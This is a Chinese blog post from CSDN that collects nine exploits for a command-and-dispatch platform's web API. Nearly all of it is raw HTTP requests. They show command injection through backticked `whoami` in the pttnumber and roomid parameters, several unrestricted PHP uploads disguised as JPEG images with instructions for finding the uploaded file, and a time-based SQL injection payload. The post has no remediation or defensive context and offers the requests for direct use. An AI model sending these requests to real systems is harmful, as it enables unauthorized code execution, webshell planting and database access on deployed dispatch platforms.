指挥调度平台漏洞合集（一篇就够了）

最新推荐文章于 2024-04-24 23:51:24 发布

柯达_

最新推荐文章于 2024-04-24 23:51:24 发布

阅读量544

点赞数 10

文章标签： web安全 sql 安全网络安全安全威胁分析

本文链接：https://blog.csdn.net/m0_64366018/article/details/135816372

版权

1.invite_one_ptter-RCE

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`whoami>test.txt`&force=1&timeout=1 HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

访问文件：
GET /api/client/ptt/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

2.invite2videoconf-RCE

GET /api/client/invite2videoconf.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

访问文件：
GET /api/client/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

3.fileupload--文件上传

POST /api/client/fileupload.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 477

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

haha
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="number";

5465
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="type";

1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="title";

1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

文件地址为/upload/file/images/{rand}/{current_year_month_day}/{timestamp}{i}.php    {rand}与上述number对应的数字一致，{current_year_month_day}为当前年月日，格式如20240120，{timestamp}为上传文件的毫秒级时间戳，{i}为0-9随机数，即此文件路径需要爆破 时间戳与i的组合值。

4.upload-文件上传

POST /api/client/upload.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="haha.php"
Content-Type: image/jpeg

haha
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

文件地址：
GET /upload/haha.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

5.task-uploadfile-文件上传

POST /api/client/task/uploadfile.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="haha.php"
Content-Type: image/jpeg

hahahaha
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

文件路径：响应包获取

6.event-uploadfile-文件上传

POST /api/client/event/uploadfile.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="haha.php"
Content-Type: image/jpeg

hahahahaha
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

文件地址：响应包获取

7.invite_one_member-RCE

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

访问文件：
GET /api/client/audiobroadcast/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

8.client-文件上传

POST /api/client/upload.php HTTP/1.1
Host: ip
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 200

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="ulfile"; filename="haha.php"
Content-Type: image/jpeg

haha
------WebKitFormBoundarymVk33liI64J7GQaK--

文件地址：
GET /upload/haha.php HTTP/1.1
Host: ip
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

9.getusername-SQL注入

/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)

柯达_

关注

10
点赞
踩
9

收藏

觉得还不错? 一键收藏
1
评论
指挥调度平台漏洞合集（一篇就够了）

【代码】指挥调度平台漏洞合集（一篇就够了）
复制链接

扫一扫

指挥调度平台漏洞合集（一篇就够了）

1.invite_one_ptter-RCE

2.invite2videoconf-RCE

3.fileupload--文件上传

4.upload-文件上传

5.task-uploadfile-文件上传

6.event-uploadfile-文件上传

7.invite_one_member-RCE

8.client-文件上传

9.getusername-SQL注入

“相关推荐”对你有帮助么？